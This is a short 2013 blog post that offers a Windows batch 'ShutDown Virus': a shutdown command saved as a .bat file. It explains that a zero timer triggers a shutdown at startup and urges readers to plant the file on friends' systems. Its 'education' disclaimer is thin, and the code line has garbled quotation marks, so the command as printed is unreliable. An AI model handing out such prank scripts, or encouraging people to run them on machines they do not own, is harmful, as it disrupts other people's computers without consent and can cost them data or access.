Wednesday, December 4, 2013

ShutDown Virus Via Notepad

Hi guys! Today am going to share with you the Notepad tricks that can make viruses and trojans. Only for education purpose!



This Post is containing:

BATCH Programming.
C/C++
Python
Visual Basic.

1.  ShutDown  Virus:

This is not a virus! But still its not a friendly one, it can affect and harm your data if not saved. You can set the timing by changing "30" to any amount.

************************************************************

@echo off

shutdown -s -t “30?

************************************************************

Effect –> May Harm uR workings and unsaved data.

Coding  Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension.
Example  –>  ron.bat

Tips: If you set the timing "00? then the system will auto shutdown ate the time of startup! This is more harmful for your system. Make it in your friend's systems :P


0 comments:

Post a Comment